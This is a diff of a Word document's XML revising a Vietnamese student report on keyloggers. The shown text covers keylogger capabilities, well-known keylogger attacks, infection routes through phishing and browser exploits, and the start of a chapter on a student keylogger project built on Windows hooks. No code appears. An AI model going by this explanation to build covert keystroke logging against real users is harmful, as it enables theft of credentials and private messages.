     </w:p>
     <w:p>
       <w:pPr>
@@ -4493,25 +7242,37 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc57761766"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">1.4. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -4520,11 +7281,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> của Keylogger</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4643,7 +7408,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Chụp bản ghi của tất cả tin nhắn tức thời (Zalo, Facebook Messenger, Skype, Viber,...)</w:t>
+        <w:t xml:space="preserve">Chụp bản ghi của tất cả tin nhắn tức thời (Zalo, Facebook Messenger, Skype, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Viber,...</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4709,6 +7492,35 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc57761767"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1.5. Những vụ tấn công bằng Keylogger nổi tiếng</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="120" w:after="0"/>
         <w:ind w:firstLine="720"/>
         <w:jc w:val="both"/>
@@ -4724,7 +7536,55 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>1.5. Những vụ tấn công bằng Keylogger nổi tiếng</w:t>
+        <w:t xml:space="preserve">Vào năm 2016, một cuộc khảo sát lớn được thực hiện bởi một công ty an ninh mạng có trụ sở tại Hoa Kỳ đã tiết lộ rằng các doanh nghiệp từ 18 quốc gia đã được nhắm mục tiêu như một phần của chiến dịch phối hợp sử dụng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">eylogger Olympic Vision để thu thập thông tin bí mật liên quan đến kinh doanh. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Chúng</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lây lan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thông qua các email giả được cho là do các đối tác kinh doanh gửi, keylogger dựa trên phần mềm này ghi lại không chỉ các lần gõ phím mà còn ghi lại hình ảnh và văn bản trong khay nhớ tạm, thông tin đăng nhập đã lưu và lịch sử trò chuyện nhắn tin tức thì.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4744,55 +7604,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Vào năm 2016, một cuộc khảo sát lớn được thực hiện bởi một công ty an ninh mạng có trụ sở tại Hoa Kỳ đã tiết lộ rằng các doanh nghiệp từ 18 quốc gia đã được nhắm mục tiêu như một phần của chiến dịch phối hợp sử dụng </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">eylogger Olympic Vision để thu thập thông tin bí mật liên quan đến kinh doanh. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Chúng</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lây lan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> thông qua các email giả được cho là do các đối tác kinh doanh gửi, keylogger dựa trên phần mềm này ghi lại không chỉ các lần gõ phím mà còn ghi lại hình ảnh và văn bản trong khay nhớ tạm, thông tin đăng nhập đã lưu và lịch sử trò chuyện nhắn tin tức thì.</w:t>
+        <w:t xml:space="preserve">Năm 2007, một nhóm tin tặc Romania đã phát động một chiến dịch lừa đảo toàn cầu liên quan đến việc gửi email độc hại đến hàng triệu địa chỉ email. Khi các nạn nhân tiềm năng nhấp vào liên kết có trong những email này, một keylogger dựa trên phần mềm sẽ được cài đặt trên máy tính của họ. Thủ phạm của cuộc tấn công mạng này cuối cùng đã được xác định vào tháng 10 năm 2018, khi đó họ tiết lộ rằng họ đã đánh cắp hơn 4 triệu đô la kể từ khi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>bắt đầu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cuộc tấn công.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4812,24 +7640,58 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Năm 2007, một nhóm tin tặc Romania đã phát động một chiến dịch lừa đảo toàn cầu liên quan đến việc gửi email độc hại đến hàng triệu địa chỉ email. Khi các nạn nhân tiềm năng nhấp vào liên kết có trong những email này, một keylogger dựa trên phần mềm sẽ được cài đặt trên máy tính của họ. Thủ phạm của cuộc tấn công mạng này cuối cùng đã được xác định vào tháng 10 năm 2018, khi đó họ tiết lộ rằng họ đã đánh cắp hơn 4 triệu đô la kể từ khi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>bắt đầu</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cuộc tấn công.</w:t>
-      </w:r>
+        <w:t>Vào năm 2015, một sinh viên ở Anh đã bị bắt và bị kết án 4 tháng tù sau khi bị lộ rằng anh ta đã sử dụng một phần mềm ghi lại bàn phím để tính điểm thi của mình. Anh ta đã cài đặt phần mềm này trên máy tính ở trường đại học của mình và sử dụng nó để lấy cắp thông tin đăng nhập của nhân viên. Sau đó, anh ấy sử dụng thông tin đăng nhập để truy cập hồ sơ đại học của mình và tăng điểm cho năm kỳ thi của mình.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc57761768"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. Con đường lây nhiễm Keylogger</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4848,7 +7710,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Vào năm 2015, một sinh viên ở Anh đã bị bắt và bị kết án 4 tháng tù sau khi bị lộ rằng anh ta đã sử dụng một phần mềm ghi lại bàn phím để tính điểm thi của mình. Anh ta đã cài đặt phần mềm này trên máy tính ở trường đại học của mình và sử dụng nó để lấy cắp thông tin đăng nhập của nhân viên. Sau đó, anh ấy sử dụng thông tin đăng nhập để truy cập hồ sơ đại học của mình và tăng điểm cho năm kỳ thi của mình.</w:t>
+        <w:t>Keylogger có thể được cài đặt khi người dùng nhấp vào liên kết hoặc mở attachment/file từ phishing mail.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4868,23 +7730,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>1.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>. Con đường lây nhiễm Keylogger</w:t>
+        <w:t>Keyloggers có thể được cài đặt thông qua webpage script. Điều này được thực hiện bằng cách khai thác một trình duyệt dễ bị tổn thương và keylogger được khởi chạy khi người dùng truy cập vào trang web độc hại.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4904,7 +7750,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Keylogger có thể được cài đặt khi người dùng nhấp vào liên kết hoặc mở attachment/file từ phishing mail.</w:t>
+        <w:t>Một keylogger có thể được cài đặt khi người dùng mở tệp đính kèm email.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4924,46 +7770,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Keyloggers có thể được cài đặt thông qua webpage script. Điều này được thực hiện bằng cách khai thác một trình duyệt dễ bị tổn thương và keylogger được khởi chạy khi người dùng truy cập vào trang web độc hại.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Một keylogger có thể được cài đặt khi người dùng mở tệp đính kèm email.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>Một keylogger có thể được cài đặt thông qua một web page script khai thác một lỗ hổng trình duyệt. Chương trình sẽ tự động được khởi chạy khi người dùng truy cập trang web bị nhiễm.</w:t>
       </w:r>
@@ -4988,24 +7794,33 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc57761769"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>*/ Tiểu kết chương 1:</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5106,8 +7921,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc56805882"/>
-      <w:bookmarkStart w:id="9" w:name="_Toc43674110"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc43674110"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc57761770"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5118,9 +7933,9 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>CHƯƠNG II:</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
+        <w:t xml:space="preserve">CHƯƠNG II: </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5130,10 +7945,70 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
-      <w:r>
+        <w:t>PHÂN TÍCH PROJECT KEYLOGGER</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="23"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Project này dừng lại ở việc nghiên cứu những công nghệ mới nên Keylogger vẫn còn đơn giản. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Keylogger có nhiệm vụ: Ghi nhận những phím người dùng nhập vào và lưu vào một file txt.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Để có thể đọc hiểu code, ta đến với một số khái niệm mới sau</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="120"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -5142,7 +8017,41 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>PHÂN TÍCH PROJECT KEYLOGGER</w:t>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc57761771"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.1. Giới thiệu về </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Hook</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5151,24 +8060,17 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="120" w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -5177,26 +8079,12 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Project này dừng lại ở việc nghiên cứu những công nghệ mới nên Keylogger vẫn còn đơn giản. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Keylogger có nhiệm vụ: Ghi nhận những phím người dùng nhập vào và lưu vào một file txt.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Để có thể đọc hiểu code, ta đến với một số khái niệm mới sau</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2.1.1. Khái niệm hàm Hook</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5216,15 +8104,34 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">2.1. Giới thiệu về </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Hook</w:t>
+        <w:t>Trong Windows, khi chúng ta thực hiện các thao tác nhấp chuột, nhấn phím… thì hệ điều hành sẽ chuyển các sự kiện này thành các thông điệp (message) rồi đưa vào hàng đợi (queue) của hệ thống. Sau đó, các thông điệp được trao lại cho từng ứng dụng cụ thể để xử lý.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Hook là một cơ chế mà một ứng dụng có thể chặn các sự kiện, như các thông điệp, thao tác chuột, bàn phím. Hàm dùng để chặn một loại sự kiện riêng biệt được gọi là hook procedure/ Hook function (thủ tục hook / hàm hook) hoặc Filter Function (hàm lọc). Mỗi khi nhận được sự kiện, hook</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5234,6 +8141,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>procedure có thể thay đổi và thậm chí hủy bỏ các sự kiện đó.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5241,25 +8156,92 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
